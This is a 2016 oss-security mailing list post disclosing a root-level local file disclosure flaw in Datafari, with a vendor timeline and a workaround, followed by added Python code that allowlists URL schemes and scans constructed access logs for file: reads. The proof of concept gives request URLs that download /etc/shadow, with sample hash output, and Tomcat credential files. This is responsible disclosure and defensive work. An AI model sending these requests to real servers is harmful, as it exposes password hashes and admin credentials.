
List:       oss-security
Subject:    Re: [oss-security] CVE Request: Datafari Local File Disclosure
From:       Fried Wil <wilfried.pascault () gmail ! com>
Date:       2016-02-24 15:00:57
Message-ID: CANTwUcqY-UXW+M-=urTkqtQLMQ5S6aG+kRKUdP02whyStXrQPQ () mail ! gmail ! com

Hi,

I forgot to add MITRE in cc for CVE assignment.

Thanks

On Wed, Feb 3, 2016 at 10:55 AM, PASCAULT Wilfried <wpascault@lexsi.com> wrote:
> Datafari, an open source enterprise search software using Apache Solr, ManifoldCF and Tomcat,
> is prone to a local file disclosure vulnerability.
> Product information
> ---------------------
> * Name : Datafari - http://www.datafari.com/
> * Editor: France Labs
> * Affected versions: 2.x<2.1.3
> * Tested: 2.1.0 and 2.1.1 on Debian Wheezy 7 and Jessie 8
> 
> Description
> -----------
> When the "filesystem" repository has been configured in Datafari (administrative privileges on
> Datafari required), a user could access any file on the system with root privileges.
> In the "$INSTALLPATH$/datafari/tomcat/conf/datafari.properties" configuration file, the
> "ALLOWLOCALFILEREADING" parameter allows by default reading files on the system.
> Datafari is by default running as user root, so any file could be downloaded with the
> "url=file:/" parameter in "/Datafari/URL" (token isn't checked).
> This issue is exploitable only when "Filesystem" repository has been set on ManifoldCF.
> 
> Proof of concept
> ----------------
> http://localhost:8080/Datafari/URL?url=file:/arbitrary_file
> 
> http://localhost:8080/Datafari/URL?url=file:/etc/shadow
> => file will be downloaded as _etc_shadow
> 
> $ head _etc_shadow
> root:$6$nTTh32TT$rLqcSGDf92tyh9aXtuTqnlGW4Ewr.IzBEcdP/kMnvhNYELz7iUgmOyiWesbJRUwEeKdKk/2yQcnAVBQYBGsiD.:16714:0:99999:7:::
> daemon:*:16714:0:99999:7:::
> bin:*:16714:0:99999:7:::
> sys:*:16714:0:99999:7:::
> sync:*:16714:0:99999:7:::
> games:*:16714:0:99999:7:::
> man:*:16714:0:99999:7:::
> lp:*:16714:0:99999:7:::
> mail:*:16714:0:99999:7:::
> news:*:16714:0:99999:7:::
> 
> Another funny file ^_^ (the Tomcat manager password could not be changed during installation):
> http://localhost:8080/Datafari/URL?url=file://opt/datafari/tomcat/conf/tomcat-users.xml
> $ cat _opt_datafari_tomcat_conf_tomcat-users.xml|grep admin
> <user password="@PASSWORD@" roles="manager-gui,SearchAdministrator" username="admin"/>
> 
> http://localhost:8080/manager/html/list
> 
> 
> Workaround
> ----------
> Set "ALLOWLOCALFILEREADING=false" in "$INSTALLPATH$/datafari/tomcat/conf/datafari.properties"
> and restart Datafari.
> 
> Timeline
> --------
> 1/6/2016: reported to vendor
> 1/11/2016: vendor responded but said it was not a security issue
> 1/11/2016: added technical details and POC
> 1/11/2016: vendor acknowledged it as a security issue
> 1/11/2016: patch was committed in master branch
> 1/28/2016: 2.1.3 released
> 
> Thanks to Cédric and Aurélien from Datafari project for their quick replies.



-- 
Wilfried Pascault
+1 514 430 7201
wilfried.pascault@gmail.com
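Added example (not from the advisory or the Datafari project): a default-deny scheme allowlist of the kind the `url=` parameter of `/Datafari/URL` lacked, plus a scan of constructed Tomcat access-log lines that flags past `file:` reads, including percent-encoded and upper-case variants. The endpoint path comes from the advisory; the log format, the `http`/`https` allowlist and the sample lines are assumptions.

```python
from __future__ import annotations
import re
from urllib.parse import urlparse, parse_qs, unquote

# Assumption: only remote http(s) targets are legitimate for a download proxy.
ALLOWED_SCHEMES = {"http", "https"}

def target_scheme(raw_url: str) -> str:
    """Lower-cased scheme of a url= value; decodes twice so file%3A/... and
    FILE%253A/... are seen for what they are."""
    return urlparse(unquote(unquote(raw_url)).strip()).scheme.lower()

def is_allowed_download_url(raw_url: str) -> bool:
    """Allowlist check: anything that is not http/https (file:, ftp:, no scheme) is refused."""
    return target_scheme(raw_url) in ALLOWED_SCHEMES

# Constructed Tomcat access-log lines (common log format), not from a real server.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [03/Feb/2016:10:55:01 +0100] "GET /Datafari/URL?url=http%3A%2F%2Fintranet%2Fdoc.pdf HTTP/1.1" 200 5120
10.0.0.9 - - [03/Feb/2016:10:56:12 +0100] "GET /Datafari/URL?url=file:/etc/shadow HTTP/1.1" 200 1024
10.0.0.9 - - [03/Feb/2016:10:57:40 +0100] "GET /Datafari/URL?url=FILE%3A//opt/datafari/tomcat/conf/tomcat-users.xml HTTP/1.1" 200 2048
10.0.0.7 - - [03/Feb/2016:10:58:03 +0100] "GET /Datafari/search?q=report HTTP/1.1" 200 9000
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def find_local_file_reads(log_text: str) -> list[dict]:
    """Return every /Datafari/URL request whose url= parameter fails the allowlist."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        req = urlparse(m["path"])          # path and query of the request line
        if req.path != "/Datafari/URL":
            continue
        # parse_qs already undoes one layer of percent-encoding
        for raw in parse_qs(req.query, keep_blank_values=True).get("url", []):
            if not is_allowed_download_url(raw):
                hits.append({"ip": m["ip"], "scheme": target_scheme(raw),
                             "target": unquote(raw), "status": int(m["status"])})
    return hits

if __name__ == "__main__":
    for hit in find_local_file_reads(SAMPLE_ACCESS_LOG):
        print(f'{hit["ip"]} fetched {hit["target"]} (HTTP {hit["status"]})')
```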

